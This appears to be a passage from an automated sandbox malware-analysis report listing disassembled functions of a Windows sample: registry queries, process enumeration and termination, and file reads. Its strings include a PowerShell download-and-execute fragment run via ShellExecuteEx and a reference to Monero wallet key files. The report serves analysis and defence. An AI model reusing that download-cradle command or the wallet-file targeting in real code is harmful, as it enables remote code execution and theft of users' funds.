                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2922868504-3474575989
                                        • Opcode ID: 47c7ee2c74af1d550d27108de6deb7fc502df88d9337b37a61ed98a99b5c152d
                                        • Instruction ID: 6bef78c5ff270c1cceff967169ff24973b961a7d70bf246e9dcbbd82f8337843
                                        • Opcode Fuzzy Hash: 47c7ee2c74af1d550d27108de6deb7fc502df88d9337b37a61ed98a99b5c152d
                                        • Instruction Fuzzy Hash: B82108B1E44308ABDB00DFD4DD4AFAEB7B8FB45B15F104519F615BB280DB7899008BA9
                                        Function 0019856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001985B6
                                        • wsprintfA.USER32 ref: 001985E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0019860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0019861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00198629
                                          • Part of subcall function 0019AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0019AAF6
                                        • RegQueryValueExA.ADVAPI32(00000000,011CE0B0,00000000,000F003F,?,00000400), ref: 0019867C
                                        • lstrlen.KERNEL32(?), ref: 00198691
                                        • RegQueryValueExA.ADVAPI32(00000000,011CDE70,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,001A0B3C), ref: 00198729
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00198798
                                        • RegCloseKey.ADVAPI32(00000000), ref: 001987AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 56261e17f7c1e921168c53d7a3f99a0aa56fd3f524c3e10e76ffe8fad0641902
                                        • Instruction ID: 124422d559b5075269abafb8203e42df4a991cb6e4dd6da61c1b8860058e70bf
                                        • Opcode Fuzzy Hash: 56261e17f7c1e921168c53d7a3f99a0aa56fd3f524c3e10e76ffe8fad0641902
                                        • Instruction Fuzzy Hash: 1C211975A10218ABDB24DB54DC85FE9B3B8FB48701F1081E8F609A6181DF71AA85CFE4
                                        Function 001999A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001999C5
                                        • Process32First.KERNEL32(0018A056,00000128), ref: 001999D9
                                        • Process32Next.KERNEL32(0018A056,00000128), ref: 001999F2
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00199A4E
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00199A6C
                                        • CloseHandle.KERNEL32(00000000), ref: 00199A79
                                        • CloseHandle.KERNEL32(0018A056), ref: 00199A88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: 41778b56ac9dc5491ecc7b7af750c87de222c8832101445c05b74b220fee6b38
                                        • Instruction ID: 46c7966579999e68bd0a455feac944622780716a7f4ecb6ee5d0fd7fec1e8fbb
                                        • Opcode Fuzzy Hash: 41778b56ac9dc5491ecc7b7af750c87de222c8832101445c05b74b220fee6b38
                                        • Instruction Fuzzy Hash: 2121E871904218ABDF25DFA5DC89BEDB7B9FB48305F1041E8E50AA7290D7749E84CF90
                                        Function 00197820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00197834
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0019783B
                                        • RegOpenKeyExA.ADVAPI32(80000002,011BC390,00000000,00020119,00000000), ref: 0019786D
                                        • RegQueryValueExA.ADVAPI32(00000000,011CDF00,00000000,00000000,?,000000FF), ref: 0019788E
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00197898
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: 0a3b1c0cecc58412d496e95a6b49050845b556c4ba0a92d122c17eb32d38ddd3
                                        • Instruction ID: 97ecb066cc567d9759a24c4b23ab36f96954ac4047fbc79e6839ef49e778d8b4
                                        • Opcode Fuzzy Hash: 0a3b1c0cecc58412d496e95a6b49050845b556c4ba0a92d122c17eb32d38ddd3
                                        • Instruction Fuzzy Hash: 1401FF79A58305BBEB04DBE4ED4AF6E7778EF48701F1041A4FA09A7291EB70D900CB54
                                        Function 001978B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001978C4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001978CB
                                        • RegOpenKeyExA.ADVAPI32(80000002,011BC390,00000000,00020119,00197849), ref: 001978EB
                                        • RegQueryValueExA.ADVAPI32(00197849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0019790A
                                        • RegCloseKey.ADVAPI32(00197849), ref: 00197914
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: 27bbbdcf4765792617557c0de255757a3745ae76db8d9fde3ec0cb2f7a8ab59d
                                        • Instruction ID: 9389387be4cbbd7eb2a41314a2cf3a2a9a842267995f797692c09b3a52655f1e
                                        • Opcode Fuzzy Hash: 27bbbdcf4765792617557c0de255757a3745ae76db8d9fde3ec0cb2f7a8ab59d
                                        • Instruction Fuzzy Hash: 9301F4B9A44309BBDB00DFE4EC49FAE7778EB44701F1045A4F605A7281DB709A00CB95
                                        Function 00194300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 00194325
                                        • RegOpenKeyExA.ADVAPI32(80000001,011CD9C0,00000000,00020119,?), ref: 00194344
                                        • RegQueryValueExA.ADVAPI32(?,011CE350,00000000,00000000,00000000,000000FF), ref: 00194368
                                        • RegCloseKey.ADVAPI32(?), ref: 00194372
                                        • lstrcat.KERNEL32(?,00000000), ref: 00194397
                                        • lstrcat.KERNEL32(?,011CE368), ref: 001943AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                        • String ID:
                                        • API String ID: 2623679115-0
                                        • Opcode ID: 41113a42e25e514fbe1677ed8c665c2e5d29ef6cf6af665810391480efd49a4d
                                        • Instruction ID: da93f8a67e692032f0e7d510b1f839365c2b09bbf34e27abcc9e78f96e8baa49
                                        • Opcode Fuzzy Hash: 41113a42e25e514fbe1677ed8c665c2e5d29ef6cf6af665810391480efd49a4d
                                        • Instruction Fuzzy Hash: 934199B69002086BDF14FBA0EC46FEE733DAB99700F4445ACB71657182EB7597888BD1
                                        Function 0018A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0018A13C
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0018A161
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 0018A181
                                        • ReadFile.KERNEL32(000000FF,?,00000000,0018148F,00000000), ref: 0018A1AA
                                        • LocalFree.KERNEL32(0018148F), ref: 0018A1E0
                                        • CloseHandle.KERNEL32(000000FF), ref: 0018A1EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 79e82be53c191370dd69b0117bcb85f9fe2fe1be506e7d7e58eb0020257c41cc
                                        • Instruction ID: d925f84a34765753f8fbbc86e649ee2384e9f017f7c44b97611163ae34cfe86a
                                        • Opcode Fuzzy Hash: 79e82be53c191370dd69b0117bcb85f9fe2fe1be506e7d7e58eb0020257c41cc
                                        • Instruction Fuzzy Hash: 52312B74A00209EFDB14DFA4D889BEE7BB5BF48701F508169F911A7390D774AA81CFA1
                                        Function 0019CB7E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Typememset
                                        • String ID:
                                        • API String ID: 3530896902-3916222277
                                        • Opcode ID: 1c65370e15245fc0b6cb9b136177f45a1c5249b2bebe2d136da08110fd21fe13
                                        • Instruction ID: 03f6ba08c6dc2b8ee90d12c80d07583f87bd5e229e4e09dedc0db44517c8fe48
                                        • Opcode Fuzzy Hash: 1c65370e15245fc0b6cb9b136177f45a1c5249b2bebe2d136da08110fd21fe13
                                        • Instruction Fuzzy Hash: B641F4B010079C9EDF218B288D95FFBBFE8AB45304F1444E8E9CA97182D3719A44CFA0
                                        Function 001949D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrcat.KERNEL32(?,011CE3F8), ref: 00194A2B
                                          • Part of subcall function 00198F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00198F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00194A51
                                        • lstrcat.KERNEL32(?,?), ref: 00194A70
                                        • lstrcat.KERNEL32(?,?), ref: 00194A84
                                        • lstrcat.KERNEL32(?,011BB798), ref: 00194A97
                                        • lstrcat.KERNEL32(?,?), ref: 00194AAB
                                        • lstrcat.KERNEL32(?,011CD8A0), ref: 00194ABF
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 00198F20: GetFileAttributesA.KERNEL32(00000000,?,00181B94,?,?,001A577C,?,?,001A0E22), ref: 00198F2F
                                          • Part of subcall function 001947C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001947D0
                                          • Part of subcall function 001947C0: RtlAllocateHeap.NTDLL(00000000), ref: 001947D7
                                          • Part of subcall function 001947C0: wsprintfA.USER32 ref: 001947F6
                                          • Part of subcall function 001947C0: FindFirstFileA.KERNEL32(?,?), ref: 0019480D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID:
                                        • API String ID: 2540262943-0
                                        • Opcode ID: fdadca9f87348b47f455dd7a24a00b489ea7bf8ccb1e60158dea7f5bb570fb22
                                        • Instruction ID: c0b6cf55956f90c93862e64ae85c911504e03c288dd28d3242659802589b837e
                                        • Opcode Fuzzy Hash: fdadca9f87348b47f455dd7a24a00b489ea7bf8ccb1e60158dea7f5bb570fb22
                                        • Instruction Fuzzy Hash: 83315EB2900208A7DF14FBB0DC85EDD733CAB68701F444599B24696052EF70E7898B94
                                        Function 00192EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0019AA50: lstrcpy.KERNEL32(001A0E1A,00000000), ref: 0019AA98
                                          • Part of subcall function 0019ACC0: lstrlen.KERNEL32(?,011C9288,?,\Monero\wallet.keys,001A0E1A), ref: 0019ACD5
                                          • Part of subcall function 0019ACC0: lstrcpy.KERNEL32(00000000), ref: 0019AD14
                                          • Part of subcall function 0019ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0019AD22
                                          • Part of subcall function 0019AC30: lstrcpy.KERNEL32(00000000,?), ref: 0019AC82
                                          • Part of subcall function 0019AC30: lstrcat.KERNEL32(00000000), ref: 0019AC92
                                          • Part of subcall function 0019ABB0: lstrcpy.KERNEL32(?,001A0E1A), ref: 0019AC15
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00192FD5
                                        Strings
                                        • <, xrefs: 00192F89
                                        • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00192F14
                                        • ')", xrefs: 00192F03
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00192F54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
